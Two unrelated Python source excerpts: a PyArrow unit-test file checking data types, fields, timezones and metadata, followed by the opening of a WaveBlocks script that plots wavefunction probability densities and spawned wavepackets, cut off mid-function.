pa.struct([pa.field('a', pa.int32(), nullable=False),
pa.field('b', pa.int8(), nullable=False),
pa.field('c', pa.string())]),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_DENSE),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_DENSE,
type_codes=[4, 8]),
pa.union([pa.field('a', pa.binary(10)),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_SPARSE),
pa.union([pa.field('a', pa.binary(10), nullable=False),
pa.field('b', pa.string())], mode=pa.lib.UnionMode_SPARSE),
pa.dictionary(pa.int32(), pa.string())
)
def test_is_boolean():
assert types.is_boolean(pa.bool_())
assert not types.is_boolean(pa.int8())
def test_is_integer():
signed_ints = [pa.int8(), pa.int16(), pa.int32(), pa.int64()]
unsigned_ints = [pa.uint8(), pa.uint16(), pa.uint32(), pa.uint64()]
for t in signed_ints + unsigned_ints:
assert types.is_integer(t)
for t in signed_ints:
assert types.is_signed_integer(t)
assert not types.is_unsigned_integer(t)
for t in unsigned_ints:
assert types.is_unsigned_integer(t)
assert not types.is_signed_integer(t)
assert not types.is_integer(pa.float32())
assert not types.is_signed_integer(pa.float32())
def test_is_floating():
for t in [pa.float16(), pa.float32(), pa.float64()]:
assert types.is_floating(t)
assert not types.is_floating(pa.int32())
def test_is_null():
assert types.is_null(pa.null())
assert not types.is_null(pa.list_(pa.int32()))
def test_null_field_may_not_be_non_nullable():
# ARROW-7273
with pytest.raises(ValueError):
pa.field('f0', pa.null(), nullable=False)
def test_is_decimal():
decimal128 = pa.decimal128(19, 4)
decimal256 = pa.decimal256(76, 38)
int32 = pa.int32()
assert types.is_decimal(decimal128)
assert types.is_decimal(decimal256)
assert not types.is_decimal(int32)
assert types.is_decimal128(decimal128)
assert not types.is_decimal128(decimal256)
assert not types.is_decimal128(int32)
assert not types.is_decimal256(decimal128)
assert types.is_decimal256(decimal256)
assert not types.is_decimal256(int32)
def test_is_list():
a = pa.list_(pa.int32())
b = pa.large_list(pa.int32())
c = pa.list_(pa.int32(), 3)
assert types.is_list(a)
assert not types.is_large_list(a)
assert not types.is_fixed_size_list(a)
assert types.is_large_list(b)
assert not types.is_list(b)
assert not types.is_fixed_size_list(b)
assert types.is_fixed_size_list(c)
assert not types.is_list(c)
assert not types.is_large_list(c)
assert not types.is_list(pa.int32())
def test_is_map():
m = pa.map_(pa.utf8(), pa.int32())
assert types.is_map(m)
assert not types.is_map(pa.int32())
fields = pa.map_(pa.field('key_name', pa.utf8(), nullable=False),
pa.field('value_name', pa.int32()))
assert types.is_map(fields)
entries_type = pa.struct([pa.field('key', pa.int8()),
pa.field('value', pa.int8())])
list_type = pa.list_(entries_type)
assert not types.is_map(list_type)
def test_is_dictionary():
assert types.is_dictionary(pa.dictionary(pa.int32(), pa.string()))
assert not types.is_dictionary(pa.int32())
def test_is_nested_or_struct():
struct_ex = pa.struct([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())])
assert types.is_struct(struct_ex)
assert not types.is_struct(pa.list_(pa.int32()))
assert types.is_nested(struct_ex)
assert types.is_nested(pa.list_(pa.int32()))
assert types.is_nested(pa.large_list(pa.int32()))
assert not types.is_nested(pa.int32())
def test_is_union():
for mode in [pa.lib.UnionMode_SPARSE, pa.lib.UnionMode_DENSE]:
assert types.is_union(pa.union([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())],
mode=mode))
assert not types.is_union(pa.list_(pa.int32()))
# TODO(wesm): is_map, once implemented
def test_is_binary_string():
assert types.is_binary(pa.binary())
assert not types.is_binary(pa.string())
assert not types.is_binary(pa.large_binary())
assert not types.is_binary(pa.large_string())
assert types.is_string(pa.string())
assert types.is_unicode(pa.string())
assert not types.is_string(pa.binary())
assert not types.is_string(pa.large_string())
assert not types.is_string(pa.large_binary())
assert types.is_large_binary(pa.large_binary())
assert not types.is_large_binary(pa.large_string())
assert not types.is_large_binary(pa.binary())
assert not types.is_large_binary(pa.string())
assert types.is_large_string(pa.large_string())
assert not types.is_large_string(pa.large_binary())
assert not types.is_large_string(pa.string())
assert not types.is_large_string(pa.binary())
assert types.is_fixed_size_binary(pa.binary(5))
assert not types.is_fixed_size_binary(pa.binary())
def test_is_temporal_date_time_timestamp():
date_types = [pa.date32(), pa.date64()]
time_types = [pa.time32('s'), pa.time64('ns')]
timestamp_types = [pa.timestamp('ms')]
duration_types = [pa.duration('ms')]
interval_types = [pa.month_day_nano_interval()]
for case in (date_types + time_types + timestamp_types + duration_types +
interval_types):
assert types.is_temporal(case)
for case in date_types:
assert types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in time_types:
assert types.is_time(case)
assert not types.is_date(case)
assert not types.is_timestamp(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in timestamp_types:
assert types.is_timestamp(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_duration(case)
assert not types.is_interval(case)
for case in duration_types:
assert types.is_duration(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_interval(case)
for case in interval_types:
assert types.is_interval(case)
assert not types.is_date(case)
assert not types.is_time(case)
assert not types.is_timestamp(case)
assert not types.is_temporal(pa.int32())
def test_is_primitive():
assert types.is_primitive(pa.int32())
assert not types.is_primitive(pa.list_(pa.int32()))
@pytest.mark.parametrize(('tz', 'expected'), [
(pytz.utc, 'UTC'),
(pytz.timezone('Europe/Paris'), 'Europe/Paris'),
    # StaticTzInfo.tzname returns '-09', so we need to infer the timezone's
    # name from the tzinfo.zone attribute
(pytz.timezone('Etc/GMT-9'), 'Etc/GMT-9'),
(pytz.FixedOffset(180), '+03:00'),
(datetime.timezone.utc, 'UTC'),
(datetime.timezone(datetime.timedelta(hours=1, minutes=30)), '+01:30')
])
def test_tzinfo_to_string(tz, expected):
assert pa.lib.tzinfo_to_string(tz) == expected
def test_dateutil_tzinfo_to_string():
pytest.importorskip("dateutil")
import dateutil.tz
tz = dateutil.tz.UTC
assert pa.lib.tzinfo_to_string(tz) == 'UTC'
tz = dateutil.tz.gettz('Europe/Paris')
assert pa.lib.tzinfo_to_string(tz) == 'Europe/Paris'
def test_zoneinfo_tzinfo_to_string():
zoneinfo = pytest.importorskip('zoneinfo')
tz = zoneinfo.ZoneInfo('UTC')
assert pa.lib.tzinfo_to_string(tz) == 'UTC'
tz = zoneinfo.ZoneInfo('Europe/Paris')
assert pa.lib.tzinfo_to_string(tz) == 'Europe/Paris'
def test_tzinfo_to_string_errors():
msg = "Not an instance of datetime.tzinfo"
with pytest.raises(TypeError):
pa.lib.tzinfo_to_string("Europe/Budapest")
if sys.version_info >= (3, 8):
# before 3.8 it was only possible to create timezone objects with whole
# number of minutes
tz = datetime.timezone(datetime.timedelta(hours=1, seconds=30))
msg = "Offset must represent whole number of minutes"
with pytest.raises(ValueError, match=msg):
pa.lib.tzinfo_to_string(tz)
@h.given(tzst.timezones())
def test_pytz_timezone_roundtrip(tz):
timezone_string = pa.lib.tzinfo_to_string(tz)
timezone_tzinfo = pa.lib.string_to_tzinfo(timezone_string)
assert timezone_tzinfo == tz
def test_convert_custom_tzinfo_objects_to_string():
class CorrectTimezone1(datetime.tzinfo):
"""
Conversion is using utcoffset()
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return datetime.timedelta(hours=-3, minutes=30)
class CorrectTimezone2(datetime.tzinfo):
"""
Conversion is using tzname()
"""
def tzname(self, dt):
return "+03:00"
def utcoffset(self, dt):
return datetime.timedelta(hours=3)
class BuggyTimezone1(datetime.tzinfo):
"""
Unable to infer name or offset
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return None
class BuggyTimezone2(datetime.tzinfo):
"""
Wrong offset type
"""
def tzname(self, dt):
return None
def utcoffset(self, dt):
return "one hour"
class BuggyTimezone3(datetime.tzinfo):
"""
Wrong timezone name type
"""
def tzname(self, dt):
return 240
def utcoffset(self, dt):
return None
assert pa.lib.tzinfo_to_string(CorrectTimezone1()) == "-02:30"
assert pa.lib.tzinfo_to_string(CorrectTimezone2()) == "+03:00"
msg = (r"Object returned by tzinfo.utcoffset\(None\) is not an instance "
r"of datetime.timedelta")
for wrong in [BuggyTimezone1(), BuggyTimezone2(), BuggyTimezone3()]:
with pytest.raises(ValueError, match=msg):
pa.lib.tzinfo_to_string(wrong)
@pytest.mark.parametrize(('string', 'expected'), [
('UTC', pytz.utc),
('Europe/Paris', pytz.timezone('Europe/Paris')),
('+03:00', pytz.FixedOffset(180)),
('+01:30', pytz.FixedOffset(90)),
('-02:00', pytz.FixedOffset(-120))
])
def test_string_to_tzinfo(string, expected):
result = pa.lib.string_to_tzinfo(string)
assert result == expected
@pytest.mark.parametrize('tz,name', [
(pytz.FixedOffset(90), '+01:30'),
(pytz.FixedOffset(-90), '-01:30'),
(pytz.utc, 'UTC'),
(pytz.timezone('America/New_York'), 'America/New_York')
])
def test_timezone_string_roundtrip(tz, name):
assert pa.lib.tzinfo_to_string(tz) == name
assert pa.lib.string_to_tzinfo(name) == tz
def test_timestamp():
for unit in ('s', 'ms', 'us', 'ns'):
for tz in (None, 'UTC', 'Europe/Paris'):
ty = pa.timestamp(unit, tz=tz)
assert ty.unit == unit
assert ty.tz == tz
for invalid_unit in ('m', 'arbit', 'rary'):
with pytest.raises(ValueError, match='Invalid time unit'):
pa.timestamp(invalid_unit)
def test_time32_units():
for valid_unit in ('s', 'ms'):
ty = pa.time32(valid_unit)
assert ty.unit == valid_unit
for invalid_unit in ('m', 'us', 'ns'):
error_msg = 'Invalid time unit for time32: {!r}'.format(invalid_unit)
with pytest.raises(ValueError, match=error_msg):
pa.time32(invalid_unit)
def test_time64_units():
for valid_unit in ('us', 'ns'):
ty = pa.time64(valid_unit)
assert ty.unit == valid_unit
for invalid_unit in ('m', 's', 'ms'):
error_msg = 'Invalid time unit for time64: {!r}'.format(invalid_unit)
with pytest.raises(ValueError, match=error_msg):
pa.time64(invalid_unit)
def test_duration():
for unit in ('s', 'ms', 'us', 'ns'):
ty = pa.duration(unit)
assert ty.unit == unit
for invalid_unit in ('m', 'arbit', 'rary'):
with pytest.raises(ValueError, match='Invalid time unit'):
pa.duration(invalid_unit)
def test_list_type():
ty = pa.list_(pa.int64())
assert isinstance(ty, pa.ListType)
assert ty.value_type == pa.int64()
assert ty.value_field == pa.field("item", pa.int64(), nullable=True)
with pytest.raises(TypeError):
pa.list_(None)
def test_large_list_type():
ty = pa.large_list(pa.utf8())
assert isinstance(ty, pa.LargeListType)
assert ty.value_type == pa.utf8()
assert ty.value_field == pa.field("item", pa.utf8(), nullable=True)
with pytest.raises(TypeError):
pa.large_list(None)
def test_map_type():
ty = pa.map_(pa.utf8(), pa.int32())
assert isinstance(ty, pa.MapType)
assert ty.key_type == pa.utf8()
assert ty.key_field == pa.field("key", pa.utf8(), nullable=False)
assert ty.item_type == pa.int32()
assert ty.item_field == pa.field("value", pa.int32(), nullable=True)
with pytest.raises(TypeError):
pa.map_(None)
with pytest.raises(TypeError):
pa.map_(pa.int32(), None)
with pytest.raises(TypeError):
pa.map_(pa.field("name", pa.string(), nullable=True), pa.int64())
def test_fixed_size_list_type():
ty = pa.list_(pa.float64(), 2)
assert isinstance(ty, pa.FixedSizeListType)
assert ty.value_type == pa.float64()
assert ty.value_field == pa.field("item", pa.float64(), nullable=True)
assert ty.list_size == 2
with pytest.raises(ValueError):
pa.list_(pa.float64(), -2)
def test_struct_type():
fields = [
# Duplicate field name on purpose
pa.field('a', pa.int64()),
pa.field('a', pa.int32()),
pa.field('b', pa.int32())
]
ty = pa.struct(fields)
assert len(ty) == ty.num_fields == 3
assert list(ty) == fields
assert ty[0].name == 'a'
assert ty[2].type == pa.int32()
with pytest.raises(IndexError):
assert ty[3]
assert ty['b'] == ty[2]
# Not found
with pytest.raises(KeyError):
ty['c']
# Neither integer nor string
with pytest.raises(TypeError):
ty[None]
for a, b in zip(ty, fields):
        assert a == b
# Construct from list of tuples
ty = pa.struct([('a', pa.int64()),
('a', pa.int32()),
('b', pa.int32())])
assert list(ty) == fields
for a, b in zip(ty, fields):
        assert a == b
# Construct from mapping
fields = [pa.field('a', pa.int64()),
pa.field('b', pa.int32())]
ty = pa.struct(OrderedDict([('a', pa.int64()),
('b', pa.int32())]))
assert list(ty) == fields
for a, b in zip(ty, fields):
        assert a == b
# Invalid args
with pytest.raises(TypeError):
pa.struct([('a', None)])
def test_struct_duplicate_field_names():
fields = [
pa.field('a', pa.int64()),
pa.field('b', pa.int32()),
pa.field('a', pa.int32())
]
ty = pa.struct(fields)
# Duplicate
with pytest.warns(UserWarning):
with pytest.raises(KeyError):
ty['a']
# StructType::GetFieldIndex
assert ty.get_field_index('a') == -1
# StructType::GetAllFieldIndices
assert ty.get_all_field_indices('a') == [0, 2]
def test_union_type():
def check_fields(ty, fields):
assert ty.num_fields == len(fields)
assert [ty[i] for i in range(ty.num_fields)] == fields
fields = [pa.field('x', pa.list_(pa.int32())),
pa.field('y', pa.binary())]
type_codes = [5, 9]
sparse_factories = [
partial(pa.union, mode='sparse'),
partial(pa.union, mode=pa.lib.UnionMode_SPARSE),
pa.sparse_union,
]
dense_factories = [
partial(pa.union, mode='dense'),
partial(pa.union, mode=pa.lib.UnionMode_DENSE),
pa.dense_union,
]
for factory in sparse_factories:
ty = factory(fields)
assert isinstance(ty, pa.SparseUnionType)
assert ty.mode == 'sparse'
check_fields(ty, fields)
assert ty.type_codes == [0, 1]
ty = factory(fields, type_codes=type_codes)
assert ty.mode == 'sparse'
check_fields(ty, fields)
assert ty.type_codes == type_codes
# Invalid number of type codes
with pytest.raises(ValueError):
factory(fields, type_codes=type_codes[1:])
for factory in dense_factories:
ty = factory(fields)
assert isinstance(ty, pa.DenseUnionType)
assert ty.mode == 'dense'
check_fields(ty, fields)
assert ty.type_codes == [0, 1]
ty = factory(fields, type_codes=type_codes)
assert ty.mode == 'dense'
check_fields(ty, fields)
assert ty.type_codes == type_codes
# Invalid number of type codes
with pytest.raises(ValueError):
factory(fields, type_codes=type_codes[1:])
for mode in ('unknown', 2):
with pytest.raises(ValueError, match='Invalid union mode'):
pa.union(fields, mode=mode)
def test_dictionary_type():
ty0 = pa.dictionary(pa.int32(), pa.string())
assert ty0.index_type == pa.int32()
assert ty0.value_type == pa.string()
assert ty0.ordered is False
ty1 = pa.dictionary(pa.int8(), pa.float64(), ordered=True)
assert ty1.index_type == pa.int8()
assert ty1.value_type == pa.float64()
assert ty1.ordered is True
# construct from non-arrow objects
ty2 = pa.dictionary('int8', 'string')
assert ty2.index_type == pa.int8()
assert ty2.value_type == pa.string()
assert ty2.ordered is False
# allow unsigned integers for index type
ty3 = pa.dictionary(pa.uint32(), pa.string())
assert ty3.index_type == pa.uint32()
assert ty3.value_type == pa.string()
assert ty3.ordered is False
# invalid index type raises
with pytest.raises(TypeError):
pa.dictionary(pa.string(), pa.int64())
def test_dictionary_ordered_equals():
# Python side checking of ARROW-6345
d1 = pa.dictionary('int32', 'binary', ordered=True)
d2 = pa.dictionary('int32', 'binary', ordered=False)
d3 = pa.dictionary('int8', 'binary', ordered=True)
d4 = pa.dictionary('int32', 'binary', ordered=True)
assert not d1.equals(d2)
assert not d1.equals(d3)
assert d1.equals(d4)
def test_types_hashable():
many_types = get_many_types()
in_dict = {}
for i, type_ in enumerate(many_types):
assert hash(type_) == hash(type_)
in_dict[type_] = i
assert len(in_dict) == len(many_types)
for i, type_ in enumerate(many_types):
assert in_dict[type_] == i
def test_types_picklable():
for ty in get_many_types():
data = pickle.dumps(ty)
assert pickle.loads(data) == ty
def test_types_weakref():
for ty in get_many_types():
wr = weakref.ref(ty)
assert wr() is not None
# Note that ty may be a singleton and therefore outlive this loop
wr = weakref.ref(pa.int32())
assert wr() is not None # singleton
wr = weakref.ref(pa.list_(pa.int32()))
assert wr() is None # not a singleton
def test_fields_hashable():
in_dict = {}
fields = [pa.field('a', pa.int32()),
pa.field('a', pa.int64()),
pa.field('a', pa.int64(), nullable=False),
pa.field('b', pa.int32()),
pa.field('b', pa.int32(), nullable=False)]
for i, field in enumerate(fields):
in_dict[field] = i
assert len(in_dict) == len(fields)
for i, field in enumerate(fields):
assert in_dict[field] == i
def test_fields_weakrefable():
field = pa.field('a', pa.int32())
wr = weakref.ref(field)
assert wr() is not None
del field
assert wr() is None
@pytest.mark.parametrize('t,check_func', [
(pa.date32(), types.is_date32),
(pa.date64(), types.is_date64),
(pa.time32('s'), types.is_time32),
(pa.time64('ns'), types.is_time64),
(pa.int8(), types.is_int8),
(pa.int16(), types.is_int16),
(pa.int32(), types.is_int32),
(pa.int64(), types.is_int64),
(pa.uint8(), types.is_uint8),
(pa.uint16(), types.is_uint16),
(pa.uint32(), types.is_uint32),
(pa.uint64(), types.is_uint64),
(pa.float16(), types.is_float16),
(pa.float32(), types.is_float32),
(pa.float64(), types.is_float64)
])
def test_exact_primitive_types(t, check_func):
assert check_func(t)
def test_type_id():
# enum values are not exposed publicly
for ty in get_many_types():
assert isinstance(ty.id, int)
def test_bit_width():
for ty, expected in [(pa.bool_(), 1),
(pa.int8(), 8),
(pa.uint32(), 32),
(pa.float16(), 16),
(pa.decimal128(19, 4), 128),
(pa.decimal256(76, 38), 256),
(pa.binary(42), 42 * 8)]:
assert ty.bit_width == expected
for ty in [pa.binary(), pa.string(), pa.list_(pa.int16())]:
with pytest.raises(ValueError, match="fixed width"):
ty.bit_width
def test_fixed_size_binary_byte_width():
ty = pa.binary(5)
assert ty.byte_width == 5
def test_decimal_properties():
ty = pa.decimal128(19, 4)
assert ty.byte_width == 16
assert ty.precision == 19
assert ty.scale == 4
ty = pa.decimal256(76, 38)
assert ty.byte_width == 32
assert ty.precision == 76
assert ty.scale == 38
def test_decimal_overflow():
pa.decimal128(1, 0)
pa.decimal128(38, 0)
for i in (0, -1, 39):
with pytest.raises(ValueError):
pa.decimal128(i, 0)
pa.decimal256(1, 0)
pa.decimal256(76, 0)
for i in (0, -1, 77):
with pytest.raises(ValueError):
pa.decimal256(i, 0)
def test_type_equality_operators():
many_types = get_many_types()
non_pyarrow = ('foo', 16, {'s', 'e', 't'})
for index, ty in enumerate(many_types):
# could use two parametrization levels,
# but that'd bloat pytest's output
for i, other in enumerate(many_types + non_pyarrow):
if i == index:
assert ty == other
else:
assert ty != other
def test_key_value_metadata():
m = pa.KeyValueMetadata({'a': 'A', 'b': 'B'})
assert len(m) == 2
assert m['a'] == b'A'
assert m[b'a'] == b'A'
assert m['b'] == b'B'
assert 'a' in m
assert b'a' in m
assert 'c' not in m
m1 = pa.KeyValueMetadata({'a': 'A', 'b': 'B'})
m2 = pa.KeyValueMetadata(a='A', b='B')
m3 = pa.KeyValueMetadata([('a', 'A'), ('b', 'B')])
assert m1 != 2
assert m1 == m2
assert m2 == m3
assert m1 == {'a': 'A', 'b': 'B'}
assert m1 != {'a': 'A', 'b': 'C'}
with pytest.raises(TypeError):
pa.KeyValueMetadata({'a': 1})
with pytest.raises(TypeError):
pa.KeyValueMetadata({1: 'a'})
with pytest.raises(TypeError):
pa.KeyValueMetadata(a=1)
expected = [(b'a', b'A'), (b'b', b'B')]
result = [(k, v) for k, v in m3.items()]
assert result == expected
assert list(m3.items()) == expected
assert list(m3.keys()) == [b'a', b'b']
assert list(m3.values()) == [b'A', b'B']
assert len(m3) == 2
# test duplicate key support
md = pa.KeyValueMetadata([
('a', 'alpha'),
('b', 'beta'),
('a', 'Alpha'),
('a', 'ALPHA'),
])
expected = [
(b'a', b'alpha'),
(b'b', b'beta'),
(b'a', b'Alpha'),
(b'a', b'ALPHA')
]
assert len(md) == 4
assert isinstance(md.keys(), Iterator)
assert isinstance(md.values(), Iterator)
assert isinstance(md.items(), Iterator)
assert list(md.items()) == expected
assert list(md.keys()) == [k for k, _ in expected]
assert list(md.values()) == [v for _, v in expected]
# first occurrence
assert md['a'] == b'alpha'
assert md['b'] == b'beta'
assert md.get_all('a') == [b'alpha', b'Alpha', b'ALPHA']
assert md.get_all('b') == [b'beta']
    assert md.get_all('unknown') == []
with pytest.raises(KeyError):
md = pa.KeyValueMetadata([
('a', 'alpha'),
('b', 'beta'),
('a', 'Alpha'),
('a', 'ALPHA'),
], b='BETA')
def test_key_value_metadata_duplicates():
meta = pa.KeyValueMetadata({'a': '1', 'b': '2'})
with pytest.raises(KeyError):
pa.KeyValueMetadata(meta, a='3')
def test_field_basic():
t = pa.string()
f = pa.field('foo', t)
assert f.name == 'foo'
assert f.nullable
assert f.type is t
assert repr(f) == "pyarrow.Field<foo: string>"
f = pa.field('foo', t, False)
assert not f.nullable
with pytest.raises(TypeError):
pa.field('foo', None)
def test_field_equals():
meta1 = {b'foo': b'bar'}
meta2 = {b'bizz': b'bazz'}
f1 = pa.field('a', pa.int8(), nullable=True)
f2 = pa.field('a', pa.int8(), nullable=True)
f3 = pa.field('a', pa.int8(), nullable=False)
f4 = pa.field('a', pa.int16(), nullable=False)
f5 = pa.field('b', pa.int16(), nullable=False)
f6 = pa.field('a', pa.int8(), nullable=True, metadata=meta1)
f7 = pa.field('a', pa.int8(), nullable=True, metadata=meta1)
f8 = pa.field('a', pa.int8(), nullable=True, metadata=meta2)
assert f1.equals(f2)
assert f6.equals(f7)
assert not f1.equals(f3)
assert not f1.equals(f4)
assert not f3.equals(f4)
assert not f4.equals(f5)
# No metadata in f1, but metadata in f6
assert f1.equals(f6)
assert not f1.equals(f6, check_metadata=True)
# Different metadata
assert f6.equals(f7)
assert f7.equals(f8)
assert not f7.equals(f8, check_metadata=True)
def test_field_equality_operators():
f1 = pa.field('a', pa.int8(), nullable=True)
f2 = pa.field('a', pa.int8(), nullable=True)
f3 = pa.field('b', pa.int8(), nullable=True)
f4 = pa.field('b', pa.int8(), nullable=False)
assert f1 == f2
assert f1 != f3
assert f3 != f4
assert f1 != 'foo'
def test_field_metadata():
f1 = pa.field('a', pa.int8())
f2 = pa.field('a', pa.int8(), metadata={})
f3 = pa.field('a', pa.int8(), metadata={b'bizz': b'bazz'})
assert f1.metadata is None
assert f2.metadata == {}
assert f3.metadata[b'bizz'] == b'bazz'
def test_field_add_remove_metadata():
import collections
f0 = pa.field('foo', pa.int32())
assert f0.metadata is None
metadata = {b'foo': b'bar', b'pandas': b'badger'}
metadata2 = collections.OrderedDict([
(b'a', b'alpha'),
(b'b', b'beta')
])
f1 = f0.with_metadata(metadata)
assert f1.metadata == metadata
f2 = f0.with_metadata(metadata2)
assert f2.metadata == metadata2
with pytest.raises(TypeError):
f0.with_metadata([1, 2, 3])
f3 = f1.remove_metadata()
assert f3.metadata is None
# idempotent
f4 = f3.remove_metadata()
assert f4.metadata is None
f5 = pa.field('foo', pa.int32(), True, metadata)
f6 = f0.with_metadata(metadata)
assert f5.equals(f6)
def test_field_modified_copies():
f0 = pa.field('foo', pa.int32(), True)
f0_ = pa.field('foo', pa.int32(), True)
assert f0.equals(f0_)
f1 = pa.field('foo', pa.int64(), True)
f1_ = f0.with_type(pa.int64())
assert f1.equals(f1_)
# Original instance is unmodified
assert f0.equals(f0_)
f2 = pa.field('foo', pa.int32(), False)
f2_ = f0.with_nullable(False)
assert f2.equals(f2_)
# Original instance is unmodified
assert f0.equals(f0_)
f3 = pa.field('bar', pa.int32(), True)
f3_ = f0.with_name('bar')
assert f3.equals(f3_)
# Original instance is unmodified
assert f0.equals(f0_)
def test_is_integer_value():
assert pa.types.is_integer_value(1)
assert pa.types.is_integer_value(np.int64(1))
assert not pa.types.is_integer_value('1')
def test_is_float_value():
assert not pa.types.is_float_value(1)
assert pa.types.is_float_value(1.)
assert pa.types.is_float_value(np.float64(1))
assert not pa.types.is_float_value('1.0')
def test_is_boolean_value():
assert not pa.types.is_boolean_value(1)
assert pa.types.is_boolean_value(True)
assert pa.types.is_boolean_value(False)
assert pa.types.is_boolean_value(np.bool_(True))
assert pa.types.is_boolean_value(np.bool_(False))
@h.given(
past.all_types |
past.all_fields |
past.all_schemas
)
@h.example(
pa.field(name='', type=pa.null(), metadata={'0': '', '': ''})
)
def test_pickling(field):
data = pickle.dumps(field)
assert pickle.loads(data) == field
@h.given(
st.lists(past.all_types) |
st.lists(past.all_fields) |
st.lists(past.all_schemas)
)
def test_hashing(items):
h.assume(
# well, this is still O(n^2), but makes the input unique
all(not a.equals(b) for i, a in enumerate(items) for b in items[:i])
)
container = {}
for i, item in enumerate(items):
assert hash(item) == hash(item)
container[item] = i
assert len(container) == len(items)
for i, item in enumerate(items):
assert container[item] == i
|
|
"""The WaveBlocks Project
Plot the wavefunctions probability densities in the eigenbasis.
Additionally plot the spawned wavepackets.
The plot can be split into separate subplots corresponding to the
left and the right of a barrier potential.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011 R. Bourquin
@license: Modified BSD License
"""
import sys
from numpy import angle, conj, real, imag
from matplotlib.pyplot import *
from WaveBlocks import PotentialFactory
from WaveBlocks import IOManager
from WaveBlocks.Plot import plotcf
import GraphicsDefaults as GD
def plot_frames(iom, gid=0, view=None, plotphase=True, plotcomponents=False, plotabssqr=False, imgsize=(12,9)):
"""Plot the wave function for a series of timesteps.
:param iom: An ``IOManager`` instance providing the simulation data.
:param gid: The group ID of the group where the two packets are stored.
:param view: The aspect ratio.
:param plotphase: Whether to plot the complex phase. (slow)
    :param plotcomponents: Whether to plot the real/imaginary parts.
:param plotabssqr: Whether to plot the absolute value squared.
"""
parameters = iom.load_parameters()
# Block IDs for mother and child wavepacket
bidm, bidc = iom.get_block_ids(groupid=gid)
grid = iom.load_grid(blockid="global")
# Precompute eigenvectors for efficiency
Potential = PotentialFactory().create_potential(parameters)
eigenvectors = Potential.evaluate_eigenvectors_at(grid)
timegrid = iom.load_wavefunction_timegrid(blockid=bidm)
for step in timegrid:
print(" Timestep # " + str(step))
# Retrieve spawn data for both packets
try:
wave_m = iom.load_wavefunction(timestep=step, blockid=bidm)
            values_m = [ wave_m[j,...] for j in range(parameters["ncomponents"]) ]
have_mother_data = True
except ValueError:
have_mother_data = False
# Retrieve spawn data
try:
wave_s = iom.load_wavefunction(timestep=step, blockid=bidc)
            values_s = [ wave_s[j,...] for j in range(parameters["ncomponents"]) ]
have_spawn_data = True
except ValueError:
have_spawn_data = False
# Plot the probability densities projected to the eigenbasis
fig = figure(figsize=imgsize)
# Create a bunch of subplots
axes = []
        for index in range(parameters["ncomponents"]):
ax = fig.add_subplot(parameters["ncomponents"],1,index+1)
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
axes.append(ax)
# Plot original Wavefunction
if have_mother_data is True:
for index, component in enumerate(values_m):
if plotcomponents is True:
axes[index].plot(grid, real(component))
axes[index].plot(grid, imag(component))
axes[index].set_ylabel(r"$\Re \varphi_"+str(index)+r", \Im \varphi_"+str(index)+r"$")
if plotabssqr is True:
axes[index].plot(grid, component*conj(component))
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
if plotphase is True:
plotcf(grid, angle(component), component*conj(component))
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
# Overlay spawned parts
if have_spawn_data is True:
for index, component in enumerate(values_s):
axes[index].plot(grid, component*conj(component), "-r")
axes[index].set_ylabel(r"$\langle \varphi_"+str(index)+r"| \varphi_"+str(index)+r"\rangle$")
# Set the axis properties
        for index in range(parameters["ncomponents"]):
axes[index].set_xlabel(r"$x$")
# Set the aspect window
if view is not None:
axes[index].set_xlim(view[:2])
axes[index].set_ylim(view[2:])
fig.suptitle(r"$\Psi$ at time $"+str(step*parameters["dt"])+r"$")
fig.savefig("wavefunction_"+ (5-len(str(step)))*"0"+str(step) +GD.output_format)
close(fig)
print(" Plotting frames finished")
def plot_frames_split(iom, gid=0, view=None, plotphase=True, plotcomponents=False, plotabssqr=False, imgsize=(12,9)):
"""Plot the wave function for a series of timesteps.
:param iom: An ``IOManager`` instance providing the simulation data.
:param gid: The group ID of the group where the two packets are stored.
:param view: The aspect ratio.
:param plotphase: Whether to plot the complex phase. (slow)
    :param plotcomponents: Whether to plot the real/imaginary parts.
:param plotabssqr: Whether to plot the absolute value squared.
"""
parameters = iom.load_parameters()
n = parameters["ncomponents"]
# Block IDs for mother and child wavepacket
bidm, bidc = iom.get_block_ids(groupid=gid)
grid = iom.load_grid(blockid="global")
# Precompute eigenvectors for efficiency
Potential = PotentialFactory().create_potential(parameters)
eigenvectors = Potential.evaluate_eigenvectors_at(grid)
timegrid = iom.load_wavefunction_timegrid(blockid=bidm)
for step in timegrid:
print(" Timestep # " + str(step))
# Split grid
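        # NOTE: X0 is a module-level global, set in the __main__ block below.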
gl = grid[grid<=X0]
gr = grid[grid>X0]
# Retrieve spawn data for both packets and split the data as necessary
try:
wave_m = iom.load_wavefunction(timestep=step, blockid=bidm)
            values_m = [ wave_m[j,...] for j in range(parameters["ncomponents"]) ]
yl = values_m[0][grid<=X0]
yr = values_m[0][grid>X0]
have_mother_data = True
except ValueError:
have_mother_data = False
# Retrieve spawn data
try:
wave_s = iom.load_wavefunction(timestep=step, blockid=bidc)
            values_s = [ wave_s[j,...] for j in range(parameters["ncomponents"]) ]
ysl = values_s[0][grid<=X0]
ysr = values_s[0][grid>X0]
have_spawn_data = True
except ValueError:
have_spawn_data = False
# Plot the probability densities projected to the eigenbasis
fig = figure(figsize=imgsize)
# Plot the probability density, left to X0
ax1 = fig.add_subplot(1,2,1)
ax1.ticklabel_format(style="sci", scilimits=(0,0), axis="y")
# mother
if have_mother_data is True:
plotcf(gl, angle(yl), conj(yl)*yl)
# spawned
if have_spawn_data is True:
plot(gl, conj(ysl)*ysl, "-r")
if view is not None:
